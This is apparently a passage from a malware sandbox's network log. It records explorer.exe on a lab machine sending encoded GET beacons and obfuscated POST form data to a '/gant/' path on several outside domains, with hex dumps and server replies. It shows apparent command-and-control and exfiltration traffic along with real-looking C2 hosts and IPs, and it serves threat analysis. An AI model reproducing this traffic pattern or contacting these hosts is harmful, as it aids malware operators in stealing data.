33 51 35 5f 74 74 74 7a 76 66 52 34 73 6a 58 52 62 65 4a 6a 64 4c 43 5a 4f 45 42 57 4f 75 31 30 78 32 41 75 33 42 38 32 7e 6f 72 70 4f 65 6d 4b 50 4b 62 38 54 6b 52 5f 66 6f 49 4b 50 35 30 62 49 75 69 64 38 53 42 51 4e 67 4c 5a 7a 79 54 45 4d 4f 4a 61 75 45 42 35 7a 42 51 4e 79 4e 4b 54 6d 56 56 4e 33 6c 51 6a 4c 66 71 4f 77 41 37 74 31 57 6d 56 41 68 6e 6d 6c 38 39 7a 45 45 44 44 71 6b 66 30 31 30 30 47 59 36 61 45 38 76 78 6d 30 62 44 36 76 39 44 42 65 57 66 38 48 59 65 31 63 6a 56 75 75 4d 65 49 6a 5f 37 37 55 5a 59 53 36 2d 55 78 6a 44 4f 6b 74 45 41 63 4d 76 36 38 53 6a 64 37 68 68 41 61 68 61 6c 59 55 45 6b 34 48 2d 4f 33 64 37 56 58 43 5f 38 55 30 68 58 34 45 4c 63 32 70 71 36 7a 49 70 52 73 44 43 54 32 76 4b 70 77 62 43 35 47 63 4f 58 35 75 4f 51 55 78 6b 49 77 4f 30 75 65 71 7a 38 54 6d 6b 44 4e 4d 5f 43 43 53 5a 70 55 75 53 73 75 43 37 59 72 33 64 54 53 54 6c 7a 45 34 38 4a 7a 38 78 53 34 28 53 4b 56 69 48 28 55 64 78 6f 73 57 6a 43 42 55 4b 4d 6c 6e 79 32 46 47 76 54 59 32 53 5a 75 7e 62 73 30 73 6d 48 66 67 50 41 32 6a 41 4f 39 5a 6c 46 39 4c 63 65 55 32 61 44 6b 4a 68 76 62 37 74 69 41 6f 34 64 68 74 4b 48 45 67 36 6e 78 32 53 28 42 73 6e 6b 7a 55 37 77 68 48 57 32 38 54 52 4e 62 6d 56 38 43 64 4a 54 6f 57 6c 5a 58 37 77 43 2d 56 52 33 5a 46 58 34 42 74 39 7a 54 42 58 35 75 67 79 61 6e 61 5f 77 54 6d 38 44 75 74 5a 4b 47 5a 6c 4a 61 57 74 5a 77 72 67 30 52 6b 38 41 69 36 65 79 43 70 5f 39 53 6d 76 7e 67 34 48 71 6e 69 6b 68 37 6e 67 48 2d 6e 2d 39 72 48 4f 61 54 42 6f 67 61 58 51 56 4d 4e 70 45 72 77 49 63 35 52 58 46 4c 48 58 53 43 72 59 66 61 4f 51 4e 74 37 34 69 71 67 2d 79 68 36 47 7a 56 50 35 30 33 66 61 6a 43 6f 38 36 54 42 31 52 67 71 4e 73 78 47 2d 4c 6f 68 5f 57 44 33 4d 57 4f 65 57 6b 45 53 54 55 70 67 45 44 6d 4e 79 38 43 64 54 59 6d 28 31 61 6d 61 79 4f 54 70 37 6e 57 31 71 41 61 50 65 51 31 54 7a 39 59 44 66 64 53
                                                                                                                  Data Ascii: j-Jh9P=7LjXB9Ja86epPwti3N0aEfUFh0C7DZgnRpmk(2iRHl8aomYIvEjiuNVLGURoTZpMGrhEmav5cJGj561dF9Qvx-pH9WVnXPIrDHMUl7A4deeBTryl4u1Vp9tyCOeJ5AY7Mezw1S6zNHzW8J9tY1Tsr39QZKlB2ox3RstyOrN8p8ZnGZRe2wt-67BANhfNsGidMcIEEaD2TFBYl3kUIWUU6k7TZbauFy3kfCp1odRUG1S5J3NCeCXosj3M84SNprc26gxN8xHqAZYns3b0kqqLUdexfqnhneLBAfiGbayTRGusBLiJBnp2jPjO5o6AlZoGH4tnmoA2kjPX~iy24X5p~ixL(K5JPEPjNqUeQADWa2qo6gyHf3994sfwkcX1gVCHoGjQAelgI10tGV(MYogkHV(Cgvxo(JtPpM9XwVRj8kHZYwDmyAHuhX8WSlrZ3pxW7u30T8(ANpkaSXjy3gUHD7eRZw3f2TJrDiqcPHrs5nTHr_SMC7sI0ggF1rxUETRNycErywEeb75WcjuCpCIc3jLtqZHQtgtgglGCB-DabwjizQJgpAZeTS3LvqVGNBsgeZJZNS4sOzy-Xvz6uaE3KxWpW8iYtsD8n_wsdSfnPeCTmBXyntbzDvbGQNb21GQVDakYLmbjbb8G4VNAgPJbVeYlDgQTtGUQyMta~_L2srduWRFnsSzqZWFiLa982pvWRj8NzBM7Hu3u5yBvAbkLfaPDA3MJ3Q5_tttzvfR4sjXRbeJjdLCZOEBWOu10x2Au3B82~orpOemKPKb8TkR_foIKP50bIuid8SBQNgLZzyTEMOJauEB5zBQNyNKTmVVN3lQjLfqOwA7t1WmVAhnml89zEEDDqkf0100GY6aE8vxm0bD6v9DBeWf8HYe1cjVuuMeIj_77UZYS6-UxjDOktEAcMv68Sjd7hhAahalYUEk4H-O3d7VXC_8U0hX4ELc2pq6zIpRsDCT2vKpwbC5GcOX5uOQUxkIwO0ueqz8TmkDNM_CCSZpUuSsuC7Yr3dTSTlzE48Jz8xS4(SKViH(UdxosWjCBUKMlny2FGvTY2SZu~bs0smHfgPA2jAO9ZlF9LceU2aDkJhvb7tiAo4dhtKHEg6nx2S(BsnkzU7whHW28TRNbmV8CdJToWlZX7wC-VR3ZFX4Bt9zTBX5ugyana_wTm8DutZKGZlJaWtZwrg0Rk8Ai6eyCp_9Smv~g4Hqnikh7ngH-n-9rHOaTBogaXQVMNpErwIc5RXFLHXSCrYfaOQNt74iqg-yh6GzVP503fajCo86TB1RgqNsxG-Loh_WD3MWOeWkESTUpgEDmNy8CdTYm(1amayOTp7nW1qAaPeQ1Tz9YDfdSzhAtpMcJ7Ba2SLd5qW6_dDdSkmQ3cEXzyHd74FGjm7sj39hfBmrqnoWR3f6qsABzY9K5X7zhgufoFn72HRn8lDBc5JSqSOjts97pMDccJhzAbiAmOzbyXnLB9rLylHH144p_l3BrgNJWuBJnzLwMDh1Z4SxZzYkd(JC6yd0S1IlDLY0q7h59ayfcYCYwu83vgn4vz4ZgrVyd23EK8tEhnfhA0iRcoa(I9r3dLMJd(669aPzufnQJYLyvUR0eodsoQKWAqJQy1id5JNqV5ej8q9owPD0AIMSU1YpXPgt9VxU8RCALyPp0IUOZCXHqgJ0Jqxtzgb(8AwMl66rXbDRF4QwU0j7hIOf2idc1lzucR0ubmcHIlyy6rcVXYa8pe3ouFGhcYtf3QWuTeXecmTNEItmyRCszbtbnElmgMLjPaL7Q0yLdbJcH0XBbek2ZleXaYYk3jCEDaQ~GoU1jb6Y6GNHUtdHYvpm4mb4BiWAP49YbEMapCFDm22cr4_5QxFn6A-Vy79JAAHe9aNlmrCst5xjlVWM9fcDtG9TTiohwGbPl9SqYOYmNLkWNcKebTrwP9ldwv49E7XtcQiURdu~UFzF_9QdQiOSz6m14mPj9n_FV7a~GRkNNBht9VrxiIQcd(b7hsKStm2UTNxEk4q9yQWLfnLF1UJwz63RdLMBhmgYxTkCdpzzwfUopN-8585hRpWJ-BGQ1GWGm9MrZ15qX(jAWDExefccKdyjODv9PM9UplaaRPIFtM-511Qc50JvjZZSkrWQpRBLYakbqAM(bCWGXEhT5F9yiX3Pssm8WSCI-qxugWfNUvcVXYC0qBMOmumNv(aJqeiKOmSdKsEp_xACJ4mZTiuHcu1FUnQjqoZDmKLIimnX7Rrz5Y_zDmJuqftUdj6bJqAvuc4hh(EtCoDpehtuszjP_IMYKWLPtTstBAh~quJvDxGv2Tz0ppmhfdOrc0n93CJPGLonA0O2Japjl87TkG6eKhZBs(92jYJt_RW4Xp5(ufWgi6i(XcanIqAlYgElfmvb6cJiyzrvsPyAJtNeAyPqs6TUXpzUitPL57CJMCVlNWnvJUbr4vX0fE9GKFP9Sr5njXkZD5zlubuRCsD1CelK80hhrohBAJ_uLII2QZmEd9fpWj6AlL5g5QW8HB3bu~WKMOhWbVRjSwVenp_LB9SK9qjVKa2jKKKjVIE3sYK0jhKlNsPgGwbG6YNQfa_do4MJLU6qLsjtfpYT22CrxUSXY2UxIG8tjjLajzCheEW5KdlQqpF0F6tT8CIa-Ismy37XQZx4ZzEC5pTWkMbaLLXyjNXy_UZtQoSE0CWFlJz6RP2zvZrdkjJc6GJPXhQf_ItmzhF0SdUiuOHBj3yNiloRioyU9Vgvlvaw87BMiWgazBELWRX2KieoKMoLTs3F7jt0yTJBS~rzi4UBXFpPozdMm(mHQFeJ3uUIyhLgsQLeV(V2P7buHZT0TJOnBwACbs-Fvd33zrJDr5wBMXO2MvRr5rOtu3HEo3GtNRH7hmGq6D1glQ74mQsCTclR2ebeW54x5NAfwFyoFYldahjzYTaDjN5lz~323m9QBeeTTVPh4TwN3roNb0Tykakeo3XaIFm8ylKSY7E6PRAgmg4I62_XyEl(hA17S1JHcy17MZ8fPNoB6fr~JQ1ZwV-0RHmVPkREPMeCCg7oLXGtJRcAjePcuJRNhaDVBHsmSmN6XmqJ5agxR0-pLsG8WWBvskH65iNwH7NWgRTVQe4Tj4yrIMqUtpflibgG_xYkBUSnVdSBgmyUP2xvB5h4c2Zwss8G339EdH1R2O5JG~p3MLuBJs41HuKpCPRX0zDY3kNh73OPFyJww0u2S8vYUnMSsYQKXk_eZQrNxqJT1lmVnDvwmaVmN6NCkWtzDCwA6WaVD9P6nf4j7JtDN9xN57-fLB-rTSfG7It13M8FiPknT~62Fq3SIQYIAdliUzZAENjk86MOyK956NQMsUpFuZtg5Q8dP4xJ_kZB1zDRLr259M5cN8jpC161DPBKJh2Y_k_cXBvpv0U7wJYW0Sabb4LeTwqugNDeb0BznFqn1QDpVRK8l5szunyED2q7MzaQEuIFQM1savANvGUtUZhu9xFfs0GY-hnGOcqYPe3UxOYBdJzF9kQBOhuo1BS~XktAgJMF02Ibq32GrhinS50GcdJUdW4xxrXShG14sAqTFZ2pOlTi5z4(tAxWdbGssdIf9e53yabjmzT88eN(D~UTwKJpdkRwD3mftOj4aY39jUXf2NztBmUIJEqlYwt7fzO6cRISBbCyGMzRLBqSTwDd89TWR(vaa8kpoCAt0Miz2UegXrcoIZIJi~ydJPWHOuiPl~6GCYpUHUZXyu15dyObW2pWfz7eB1aHT1jAd42BISqnFAqqVNzcEPTI6wU~ELI7k1R(QH1AQYvRZNdGfnRqZvd3KcZ1n2i~mG2ln8aKWNJNbfXn3mEAsU0nNCNi3x2ZcQjp4NEsDbP(0k9nx0XV7~WRhAo9o2oIM194RjCXdDBFkr1eMWRNjgTqbF9HMN1gUBdoySCVVcMqS41DwIdyEyWhfej0RoHhh4hQ6g4RlV-SHg0BUhAhnqCYj1LmVhVtCnU73BO0z~Gvduc(JyQ0Q3oMp5h(5VXSvZEFI9e5R8EkywUmB3XccUwJ4135h7IZvep5P~tGUOfyNNGbbwcU8~98Nm3cl7RM6gF3dYBuiam(QgXzNhue-yk8
                                                                                                                  Feb 13, 2023 19:00:05.232089043 CET459OUTData Raw: 6b 4b 32 70 36 38 50 74 5a 6d 43 75 4d 39 61 72 47 41 48 74 50 76 4e 4d 43 57 4d 4e 39 68 65 65 32 66 65 65 42 35 7a 44 36 33 6f 52 30 43 64 68 6b 44 6e 2d 43 50 28 57 50 49 49 2d 49 45 39 74 6a 71 6b 65 79 4a 37 52 49 5f 74 58 79 38 67 74 73 39
                                                                                                                  Data Ascii: kK2p68PtZmCuM9arGAHtPvNMCWMN9hee2feeB5zD63oR0CdhkDn-CP(WPII-IE9tjqkeyJ7RI_tXy8gts9lPtTzyMccPdu4QtuJSwh9zCZZP5F8RxZs9MloK0cz11-e2Q_f7JaXBs6r3w0v5qN0LoiTSVUyt9GNgVqQ8kvyHqBmUKzR5mWl3Pws-hfGfmTlOwPWyrT1WofGKSe8d3Lwe7opimBNnTM41HtPR32yfFZekXOMD0D5
                                                                                                                  Feb 13, 2023 19:00:05.232156038 CET460OUTData Raw: 62 52 4f 31 56 5a 6d 35 48 4b 65 54 56 34 35 79 65 34 33 32 4a 55 35 4d 55 70 55 6f 6c 70 6d 6e 57 38 7a 6b 65 4f 72 68 71 62 52 52 41 56 43 77 51 4b 63 71 6c 34 32 4d 76 44 41 41 37 4b 32 78 51 32 55 68 32 33 69 72 73 62 41 35 36 31 7e 4f 4a 57
                                                                                                                  Data Ascii: bRO1VZm5HKeTV45ye432JU5MUpUolpmnW8zkeOrhqbRRAVCwQKcql42MvDAA7K2xQ2Uh23irsbA561~OJWptN722GmaUAu1gjCiTsQaieIpzYA39AxmkWMsFB_NLV-SQL90GD6TV9IgW3Z861mIA3UXfeDC7yvKuFFNMTQc59b353ytduSMcZ6YyfNtA6X9QkmtGcLFzW3KkEhZN3OpsOs0AxqxcfE6V~QKCwZvjnBeGbusZ~RH
                                                                                                                  Feb 13, 2023 19:00:05.245107889 CET462OUTData Raw: 38 5a 61 4e 30 44 69 4c 49 67 43 6b 4b 5a 76 64 42 71 79 7a 72 31 50 7a 71 54 70 72 66 6c 4e 62 6f 5f 52 6c 48 54 64 2d 43 38 76 53 43 41 46 6f 55 68 78 4f 44 4a 5a 6b 28 67 56 38 4e 32 28 58 51 74 46 74 78 73 65 34 6c 65 6e 30 38 2d 61 43 54 6e
                                                                                                                  Data Ascii: 8ZaN0DiLIgCkKZvdBqyzr1PzqTprflNbo_RlHTd-C8vSCAFoUhxODJZk(gV8N2(XQtFtxse4len08-aCTnO4CikTSWKS0WXw2HXvXYgJDlBxUHvYQJOmJF5Zq3aCPNCe7JOtYF8ArgnylfAL4FaZn8bT2PWY0pn-fXB2JaQhF7NTX69mXQZMrxFGwEd7AVaBkucEk58LS24NBn(HKQw_8I43a9qt8sMp4Yg1CnzlO41u5J0jeBE
                                                                                                                  Feb 13, 2023 19:00:05.245320082 CET476OUTData Raw: 53 6b 74 38 78 75 55 6c 56 45 43 75 37 42 57 72 38 46 49 42 37 51 63 45 61 68 75 4e 4c 33 35 61 53 6a 38 5a 4a 44 66 71 6b 75 46 6c 39 54 7e 65 31 54 6c 49 43 50 33 4c 28 70 53 55 66 38 72 4a 69 48 6a 4b 42 6d 6b 75 72 6e 64 64 78 68 54 5f 78 56
                                                                                                                  Data Ascii: Skt8xuUlVECu7BWr8FIB7QcEahuNL35aSj8ZJDfqkuFl9T~e1TlICP3L(pSUf8rJiHjKBmkurnddxhT_xVIia-fjnOoa(S8IaWE3(oWoLbbv3ZLKMD9dY4QmaK83f1P9LwnELCc5s0r4LQLGqvAhYh43F-J1gjTZbLj3Ov2fIwIaf898C-2V4Q9zRjcNxapeh2zuc1aqlpHChLWEvfO-fqZMcvh7j7I919DtDbieXoblO3GwvXk
                                                                                                                  Feb 13, 2023 19:00:05.245474100 CET485OUTData Raw: 63 7a 58 75 69 4f 4a 78 59 48 53 56 70 56 6d 36 45 69 43 6e 67 4b 4f 7a 6f 73 42 63 36 42 55 53 63 75 42 5f 76 67 33 58 73 66 38 59 79 41 56 30 6f 49 6d 66 33 56 43 44 35 71 6c 33 5a 6b 47 42 4f 72 67 62 69 71 6d 38 67 33 57 54 30 50 68 32 78 54
                                                                                                                  Data Ascii: czXuiOJxYHSVpVm6EiCngKOzosBc6BUScuB_vg3Xsf8YyAV0oImf3VCD5ql3ZkGBOrgbiqm8g3WT0Ph2xTEkND8V~T21oUkGkzdRAiWnbUQCwlKKQwBqun5RdmIjq7Uqf3keeWqahNgkykaGKGSD9hB9szwGN5kiFuTH3IXJN5YjYJNKC4d31o0gUCItKNJP2fF6sko38hzgIOW_~LXo5EzU6CeHyYSmJopojUMj1g~z6QYHv8~
                                                                                                                  Feb 13, 2023 19:00:05.245640993 CET486OUTData Raw: 4a 7a 4d 79 4d 36 52 42 53 58 30 74 32 57 73 6c 49 57 4f 36 4c 71 36 52 69 48 74 68 6e 43 4f 52 50 59 78 31 73 45 50 46 78 37 4a 61 77 52 32 69 51 78 63 4c 50 30 32 53 4d 4c 57 4d 62 49 6c 72 6e 42 5a 7a 32 75 74 77 4f 6e 7a 4f 48 2d 4d 58 6d 54
                                                                                                                  Data Ascii: JzMyM6RBSX0t2WslIWO6Lq6RiHthnCORPYx1sEPFx7JawR2iQxcLP02SMLWMbIlrnBZz2utwOnzOH-MXmTFS9zx5HQgrA8bDu9TnKHKSDhFpQrzest675g9Y(67yIB2r0hPgr2AavrEe5jG_6ZZWth(9jxNQrsDQssoIkGDbJUcuZUci3HJQkbp6zKZHiGd7wuZQJWEeXLDWHFMQV4bJCFwrnAoLHYNvCd7iGSPyCCREz7ciHf(
                                                                                                                  Feb 13, 2023 19:00:05.258306980 CET489OUTData Raw: 4c 33 79 31 54 66 62 2d 47 4e 66 6e 50 79 38 59 49 75 50 41 4d 38 62 71 62 4a 55 51 46 59 76 57 35 67 44 2d 28 61 77 35 4e 6f 63 62 55 49 41 33 7a 77 48 69 51 53 38 5a 44 79 73 71 47 43 6b 79 55 69 62 79 58 69 37 30 57 37 4e 6f 69 33 4d 49 28 4b
                                                                                                                  Data Ascii: L3y1Tfb-GNfnPy8YIuPAM8bqbJUQFYvW5gD-(aw5NocbUIA3zwHiQS8ZDysqGCkyUibyXi70W7Noi3MI(Ky-i26TgtKZP7p93BUjwQpKb6gRDTGmrh00dbe7Ae(4NK4pHl5_YN~HgWVhkpQvDFajSbeDx8IZLMlmB9w4DBL1v97rq_0tzv1a2LIZ2oprdGPukGChBoIqtYnZ~OmJgveCPyucUokV2qS_mzmv2pqRhfT11FBlCgs
                                                                                                                  Feb 13, 2023 19:00:05.258479118 CET494OUTData Raw: 74 66 73 48 52 75 78 66 63 6c 38 73 31 30 70 69 54 59 4b 57 48 45 35 52 4b 41 53 69 6f 6a 30 54 49 38 62 70 28 57 62 49 69 46 79 45 71 51 48 6d 6e 67 7e 2d 6b 4a 4f 57 41 66 34 50 52 48 4d 34 30 72 42 54 28 76 41 4a 30 71 42 51 62 55 55 72 51 6c
                                                                                                                  Data Ascii: tfsHRuxfcl8s10piTYKWHE5RKASioj0TI8bp(WbIiFyEqQHmng~-kJOWAf4PRHM40rBT(vAJ0qBQbUUrQlrKBXwGD3YDbemLixB5ubMdrh3K04IntUqIIQWcdksmI_Lxgv7ryOEnxWwOFA~y~32tieYxor5vDvwDukEPJYPTlZCT1xvGKdc0MCuOVpFaFtdpaSk6onU5l3tBq5gi7Tzr6ypRIyrWsx5Wl7QPw0x5kXKaJodNGaC
                                                                                                                  Feb 13, 2023 19:00:05.258641005 CET500OUTData Raw: 46 6d 61 5f 72 76 45 4d 4a 63 54 44 59 30 7a 38 6c 58 50 53 30 5f 69 73 39 6c 67 52 44 6a 4b 38 50 42 41 37 4b 42 61 4d 30 6a 28 43 45 6f 62 33 69 39 69 67 4c 74 56 61 6f 44 73 55 72 38 35 75 64 57 65 5f 4e 38 4f 75 53 58 42 4c 44 37 42 38 54 38
                                                                                                                  Data Ascii: Fma_rvEMJcTDY0z8lXPS0_is9lgRDjK8PBA7KBaM0j(CEob3i9igLtVaoDsUr85udWe_N8OuSXBLD7B8T8ngCWvzVC3C0LEASJgYAKX5DdXy5VUE7kcNcoY1N3HCGkLSdgXImgkkzjY4bfzvFLgiT0UR1VT6BwK7n1vyYyTCWkcKfRF1xHe3WJPpzosXe22iM4ndQLrkOdmMxPeoL80T1VkzsB6aEkehvG8W6QHmW8oKdnf_dge
                                                                                                                  Feb 13, 2023 19:00:05.274862051 CET501INHTTP/1.1 404 Not Found
                                                                                                                  Content-Type: text/html
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: close
                                                                                                                  Date: Mon, 13 Feb 2023 18:00:05 GMT
                                                                                                                  Server: Apache
                                                                                                                  Content-Encoding: gzip
                                                                                                                  Data Raw: 31 65 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 52 4b 8f d3 30 10 be f7 57 0c 41 a2 17 12 b7 74 0f 7d 24 7b a0 ad c4 4a 65 59 41 78 1d 8d 33 6d 2c 39 b6 6b 8f fb d8 5f 8f 93 6e 0a 8b 56 9c 3c b6 be d7 78 26 7f b5 fa b4 2c 7f 3e ac a1 a6 46 c1 c3 d7 f7 9b bb 25 24 29 63 df 27 4b c6 56 e5 0a 7e 7c 28 3f 6e 60 9c 8d a0 74 5c 7b 49 d2 68 ae 18 5b df 27 83 a4 26 b2 73 c6 8e c7 63 76 9c 64 c6 ed 58 f9 99 9d 5a ad 71 4b 7e 2a 53 fa 8b 99 55 54 25 b7 83 bc 33 54 5c ef 8a 04 75 02 a7 46 cd 9f dd b4 2f 5e 90 1f cf 66 b3 8b 6a d4 80 bc 46 5e c5 13 72 92 a4 b0 ad 60 ed 9c 71 70 33 ba 81 14 ee 0d c1 d6 04 5d b5 10 76 c5 e4 0d 12 07 61 34 a1 a6 22 21 3c 11 6b e3 2c 40 d4 dc 79 a4 22 d0 36 9d 26 f1 53 c8 a6 b8 0f f2 50 24 cb 0b 3c 2d cf 16 5b 6f f8 47 45 9b 54 70 51 e3 73 56 f7 94 b6 56 ce a8 2e 32 7b ca 9c ff 32 d5 19 3c 9d 15 16 c9 36 02 d2 2d 6f a4 3a cf b9 93 5c 2d 2e 16 f5 b8 47 08 a3 8c 9b bf 1e f1 c9 bb a9 58 74 78 2f 1f 71 1e 07 83 cd 05 fd 9f d6 eb 71 97 d8 f6 6a 7f f8 a3 6c 7a e5 6f 10 b6 52 d4 12 1d b8 b6 6b 0f 7a c8 c1 72 0f 6f 90 8b 40 b8 a0 be 80 d8 4f 38 f4 b7 6c 70 a7 c0 62 20 f0 43 be 93 0e aa 61 d0 08 e8 1c 06 07 84 a2 d6 72 1f 30 83 6f 18 a4 52 f8 08 ae a7 a2 f7 fc 1c 0d 83 ba 6a 3b 19 59 d8 c4 d9 64 f0 45 c2 c1 84 18 04 c1 46 c3 c8 6c e3 70 21 7a 7e 15 b9 3c 5c 73 73 1b 95 77 8e 1f 70 e1 c1 aa e0 5b 2d 1f 23 68 e2 24 0f e8 df 82 40 c5 c1 cb 9d 96 5b 89 b0 0f 43 a9 80 bf d0 a1 0f d6 3a d9 f4 46 59 b7 43 36 fe 63 ce da d1 c5 15 ee 96 e6 76 f0 1b 11 e8 b3 c9 45 03 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 1ee}RK0WAt}${JeYAx3m,9k_nV<x&,>F%$)c'KV~|(?n`t\{Ih['&scvdXZqK~*SUT%3T\uF/^fjF^r`qp3]va4"!<k,@y"6&SP$<-[oGETpQsVV.2{2<6-o:\-.GXtx/qqjlzoRkzro@O8lpb Car0oRj;YdEFlp!z~<\sswp[-#h$@[C:FYC6cvE0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  50192.168.11.2049903198.251.81.24780C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:04:36.557122946 CET1249OUTGET /gant/?j-Jh9P=B0pNFIyvfWNbMZ+y1M/LgZADusV71feeQe6W+GB1ssl6KD/NibUunE4IvTatYpRgFtRcLWhob4pstpOdFq/XGd2nPwIBJf7TLg==&T9=bPxTYTKdI2 HTTP/1.1
                                                                                                                  Host: www.dachmotors.com
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                  Data Ascii:
                                                                                                                  Feb 13, 2023 19:04:37.174376011 CET1250INHTTP/1.1 301 Moved Permanently
                                                                                                                  Connection: close
                                                                                                                  x-powered-by: PHP/8.0.27
                                                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                  cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                  content-type: text/html; charset=UTF-8
                                                                                                                  x-redirect-by: WordPress
                                                                                                                  location: http://dachmotors.com/gant/?j-Jh9P=B0pNFIyvfWNbMZ+y1M/LgZADusV71feeQe6W+GB1ssl6KD/NibUunE4IvTatYpRgFtRcLWhob4pstpOdFq/XGd2nPwIBJf7TLg==&T9=bPxTYTKdI2
                                                                                                                  content-length: 0
                                                                                                                  date: Mon, 13 Feb 2023 18:04:37 GMT
                                                                                                                  server: LiteSpeed


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  51192.168.11.2049904185.215.4.3680C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:04:45.806905031 CET1251OUTGET /gant/?j-Jh9P=5TA3zgeHNm1wf6Thb5AMtjQQLB1qlu2Rn/MQ6MujY0wd45AEg4BITkIozYXp1KG/kBQAm1Ey7A9M4ZpJCjezXwYaBakyUBQ9Vg==&T9=bPxTYTKdI2 HTTP/1.1
                                                                                                                  Host: www.gargaloid.ru
                                                                                                                  Connection: close
                                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                                  Data Ascii:
                                                                                                                  Feb 13, 2023 19:04:45.868644953 CET1252INHTTP/1.1 301 Moved Permanently
                                                                                                                  Server: ddos-guard
                                                                                                                  Connection: close
                                                                                                                  Set-Cookie: __ddg1_=3rOaGY5BJ92SqMjV3kJF; Domain=.gargaloid.ru; HttpOnly; Path=/; Expires=Tue, 13-Feb-2024 18:04:45 GMT
                                                                                                                  Date: Mon, 13 Feb 2023 18:04:45 GMT
                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                  Content-Length: 364
                                                                                                                  Location: https://www.gargaloid.ru/gant/?j-Jh9P=5TA3zgeHNm1wf6Thb5AMtjQQLB1qlu2Rn/MQ6MujY0wd45AEg4BITkIozYXp1KG/kBQAm1Ey7A9M4ZpJCjezXwYaBakyUBQ9Vg==&T9=bPxTYTKdI2
                                                                                                                  X-Host: www.gargaloid.ru
                                                                                                                  cache-control: max-age=0
                                                                                                                  cache-control: public
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 61 72 67 61 6c 6f 69 64 2e 72 75 2f 67 61 6e 74 2f 3f 6a 2d 4a 68 39 50 3d 35 54 41 33 7a 67 65 48 4e 6d 31 77 66 36 54 68 62 35 41 4d 74 6a 51 51 4c 42 31 71 6c 75 32 52 6e 2f 4d 51 36 4d 75 6a 59 30 77 64 34 35 41 45 67 34 42 49 54 6b 49 6f 7a 59 58 70 31 4b 47 2f 6b 42 51 41 6d 31 45 79 37 41 39 4d 34 5a 70 4a 43 6a 65 7a 58 77 59 61 42 61 6b 79 55 42 51 39 56 67 3d 3d 26 61 6d 70 3b 54 39 3d 62 50 78 54 59 54 4b 64 49 32 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.gargaloid.ru/gant/?j-Jh9P=5TA3zgeHNm1wf6Thb5AMtjQQLB1qlu2Rn/MQ6MujY0wd45AEg4BITkIozYXp1KG/kBQAm1Ey7A9M4ZpJCjezXwYaBakyUBQ9Vg==&amp;T9=bPxTYTKdI2">here</a>.</p></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  52192.168.11.2049906217.160.0.3780C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:04:50.897166014 CET1260OUTPOST /gant/ HTTP/1.1
                                                                                                                  Host: www.grenoble-informatique.com
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 188
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Origin: http://www.grenoble-informatique.com
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://www.grenoble-informatique.com/gant/
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Data Raw: 6a 2d 4a 68 39 50 3d 37 4c 6a 58 42 39 4a 61 38 36 65 70 4f 51 39 69 31 73 30 61 43 5f 55 4b 71 55 43 37 4d 35 67 6a 52 70 36 6b 28 7a 4f 42 47 51 45 61 6d 56 67 49 75 67 44 69 69 74 56 4c 58 30 52 73 63 35 6f 4e 47 72 31 2d 6d 65 72 44 63 4d 32 6a 34 59 39 64 4e 66 49 73 31 2d 70 5f 31 32 56 67 58 50 4a 77 44 48 4d 32 6c 35 35 46 64 59 32 42 54 75 4f 6c 28 49 4a 56 67 74 74 79 53 2d 65 4e 6b 77 59 4c 4d 65 36 6c 31 51 6d 4a 4e 33 62 57 39 61 6c 74 62 6b 54 76 37 6e 39 4d 66 4b 6c 50 6c 6f 6f 4e 62 64 38 49 66 70 46 74 6f 66 35 77 49 36 67 6e 73 41 29 2e 00 00 00 00 00 00 00 00
                                                                                                                  Data Ascii: j-Jh9P=7LjXB9Ja86epOQ9i1s0aC_UKqUC7M5gjRp6k(zOBGQEamVgIugDiitVLX0Rsc5oNGr1-merDcM2j4Y9dNfIs1-p_12VgXPJwDHM2l55FdY2BTuOl(IJVgttyS-eNkwYLMe6l1QmJN3bW9altbkTv7n9MfKlPlooNbd8IfpFtof5wI6gnsA).
